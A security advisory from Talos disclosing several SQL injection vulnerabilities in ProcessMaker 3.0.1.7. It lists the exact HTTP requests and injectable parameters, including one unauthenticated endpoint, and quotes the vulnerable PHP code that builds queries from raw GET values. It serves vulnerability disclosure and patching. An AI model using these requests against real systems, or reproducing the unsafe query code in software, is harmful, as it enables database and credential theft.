Talos Vulnerability Report

TALOS-2017-0313

ProcessMaker Enterprise Core Multiple SQL Injection Vulnerabilities

July 19, 2017
CVE Number

CVE-2016-9048

Summary

Multiple exploitable SQL Injection vulnerabilities exists in ProcessMarker Enterprise Core 3.0.1.7-community. Specially crafted web requests can cause SQL injections. An attacker can send a web request with parameters containing SQL injection attacks to trigger this vulnerability, potentially allowing exfiltration of the database, user credentials and in certain setups access the underlying operating system.

Tested Versions

ProcessMaker Enterprise Core 3.0.1.7-community

Product URLs

https://www.processmaker.com/community-2

CVSSv3 Score

7.4 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Details

SQL injection has been found and confirmed within ProcessMarker Enterprise Core. A successful attack could allow an attacker to access information such as usernames and password hashes that are stored in the database.

The following URLs and parameters have been confirmed to suffer from SQL injections and could be exploited by autenticated attackers:

GET /sysworkflow/en/neoclassic/events/eventsAjax?
request=eventList&start=1&limit=25&process=1&type=1&status=1&sort=[SQL INJECTION]&dir=ASC           
HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close

POST /sysworkflow/en/neoclassic/cases/proxyPMTablesSaveFields.php HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

callback=1&dir=1&sort=[SQL INJECTION]&query=1&table=1&action=1
POST /sysworkflow/en/neoclassic/cases/proxyProcessList.php?t=1&callback=a&dir=/&query=13 
HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

sort=[SQL INJECTION]
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?function=changeLabel&cat=1[SQL 
INJECTION]&node=1&lang=1&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?
function=changeLabel&cat=1&node=1&lang=1[SQL INJECTION]&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?
function=changeLabel&cat=1&node=1[SQL INJECTION]&lang=1&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?function=changeLabel&cat=1[SQL 
INJECTION]&node=1&lang=1&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?   
function=changeLabel&cat=1&node=1&lang=1[SQL INJECTION]&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?   
function=changeLabel&cat=1&node=1[SQL INJECTION]&lang=1&langLabel=1&label=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close

Unauthenticated SQL injection:

GET /gulliver/genericAjax?request=storeInTmp&pkt=int&pk=[SQL Injection]&table=a[SQL 
Injection]&cnn=[CONNECTION NAME] HTTP/1.1
Host: 192.168.56.101
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

Note: For this SQL injection to work a 'cnn' parameter needs to be know as that is the parameter used to establish the connection with the database. The following code which can be directly invoked from the server presents this issue:

gulliver/methods/genericAjax.php
        173     case 'storeInTmp':
174       try {
177         $con = Propel::getConnection($_GET['cnn']);
178         if($_GET['pkt'] == 'int'){
179           $rs = $con->executeQuery("SELECT MAX({$_GET['pk']}) as lastId FROM {$_GET['table']};");
180           $rs->next();
181           $row = $rs->getRow();
182           $gKey = (int)$row['lastId'] + 1;
183
184         } else {
185           $gKey = G::encryptOld(date('Y-m-d H:i:s').'@'.rand());
186         }
187
188         $rs = $con->executeQuery("INSERT INTO {$_GET['table']} ({$_GET['pk']}, {$_GET['fld']}) 
VALUES ('$gKey', '{$_GET['value']}');");
189
190         echo "{status: 1, message: \"success\"}";
191       } catch (Exception $e) {
192         $err = $e->getMessage();
193         //$err = eregi_replace("[\n|\r|\n\r]", ' ', $err);
194         $err = preg_replace("[\n|\r|\n\r]", " ", $err); //Made compatible to PHP 5.3
195
196         echo "{status: 0, message: \"" . $err . "\"}";
197       }
198       break;
199   }
200 }

Mitigation

Restrict access to known, trusted users and hosts.

Timeline

2016-02-15 - Vendor Disclosure
2017-07-19 - Public Release

Credit

Discovered by Jerzy Kramarz of Portcullis Computer Security Limited.